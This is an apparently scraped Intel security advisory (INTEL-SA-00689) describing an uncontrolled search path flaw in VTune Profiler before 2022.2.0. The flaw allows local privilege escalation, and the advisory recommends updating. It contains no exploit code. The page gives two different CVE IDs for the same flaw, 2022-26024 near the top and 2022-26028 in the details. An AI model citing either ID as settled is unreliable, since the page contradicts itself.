**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-26024: INTEL-SA-00689

Uncontrolled search path in the Intel(R) VTune(TM) Profiler software before version 2022.2.0 may allow an authenticated user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® VTune™ Profiler Advisory**

**Summary: **

A potential security vulnerability in the Intel® VTune™ Profiler software may allow escalation of privilege.  Intel is releasing software updates to mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2022-26028

Description: Uncontrolled search path in the Intel(R) VTune(TM) Profiler software before version 2022.2.0 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

**Affected Products:**

Intel® VTune™ Profiler software before version 2022.2.0.

**Recommendations:**

Intel recommends updating the Intel® VTune™ Profiler to version 2022.2.0.

Updates are available for download at this location:

https://www.intel.com/content/www/us/en/developer/tools/oneapi/vtune-profiler-download

**Acknowledgements:**

Intel would like to thank houjingyi for reporting this issue.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/08/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

Tag

#chrome